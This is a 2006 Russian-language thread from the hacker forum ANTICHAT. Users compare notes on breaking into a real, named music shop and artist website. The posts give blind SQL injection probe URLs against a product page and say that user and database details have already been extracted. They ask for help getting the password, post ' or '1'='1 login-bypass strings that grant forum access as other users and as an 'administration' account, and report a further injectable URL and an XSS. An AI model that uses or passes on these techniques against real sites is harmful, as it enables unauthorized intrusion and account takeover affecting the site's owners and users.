HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Blind SQL Injection в магазине у Земфиры
  #1  
Старый 23.03.2006, 00:05
Dmcox
Новичок
Регистрация: 18.12.2005
Сообщений: 11
С нами: 10733570

Репутация: 11
По умолчанию Blind SQL Injection в магазине у Земфиры

Есть товар по ссылке http://shop.zemfira.ru/?level=4&pid=18135540
Делаем запрос http://shop.zemfira.ru/?level=4&pid=18135540 AND 1=0 (нет товара )
Делаем опять запрос http://shop.zemfira.ru/?level=4&pid=18135540 AND 1=1 (поевляется товар)
Так вот все бы хорошо юзера вытащил название базы тоже и версию MySQL, а вот пасс не как не хочет
Помогите заранее СПАСИБО
 
Ответить с цитированием

  #2  
Старый 23.03.2006, 00:29
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию

вот что еще нашел. на форуме если вместо логина и пароля вписать ' or '1'='1, то он войдет как дарья, id=1
 
Ответить с цитированием

  #3  
Старый 23.03.2006, 12:22
ArdeOS
Участник форума
Регистрация: 16.07.2004
Сообщений: 196
С нами: 11482946

Репутация: 211
По умолчанию

Можно зайти под "администрацией" если в логине написать "администрация' or '1'='1"
и в пароле ' or '1'='1 ... но пока не могу найти админку (((
 
Ответить с цитированием

  #4  
Старый 23.03.2006, 18:53
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию

Цитата:
Сообщение от ArdeOS  
Можно зайти под "администрацией" если в логине написать "администрация' or '1'='1"
и в пароле ' or '1'='1 ... но пока не могу найти админку (((
а что будет если ты что нибуть другое, не администрация напишешь, если честно ты просто чушь снес, т.к. ' or '1'='1 подразумевает первый попавшийся логин, обычно админа. Вот если логин будет "администрация", а пароль ' or '1'='1 , вот тогда ты зайдешь под администрацией, конечно если он найдет в базе такой логин.
 
Ответить с цитированием

  #5  
Старый 23.03.2006, 19:32
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Нашёл ещё одну скуль
http://www.zemfira.ru/?go=afisha&yy=2005'
__________________
 
Ответить с цитированием

  #6  
Старый 23.03.2006, 19:54
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

ты где там зашёл если только через форум у меня ник ксю получается =))
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #7  
Старый 23.03.2006, 23:07
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Также нашёл XSS

ТУТ ОНА
__________________

Последний раз редактировалось +toxa+; 23.03.2006 в 23:10..
 
Ответить с цитированием

  #8  
Старый 24.03.2006, 08:40
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
С нами: 11200586

Репутация: 1398


По умолчанию

Если скуль есть то Xss уже не нужна =))
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #9  
Старый 25.03.2006, 00:33
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


По умолчанию

Входит под каким попало ником... у мну Devill надо долго мучаться...
 
Ответить с цитированием

  #10  
Старый 25.03.2006, 00:39
ArdeOS
Участник форума
Регистрация: 16.07.2004
Сообщений: 196
С нами: 11482946

Репутация: 211
По умолчанию

Да, выходит так ...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.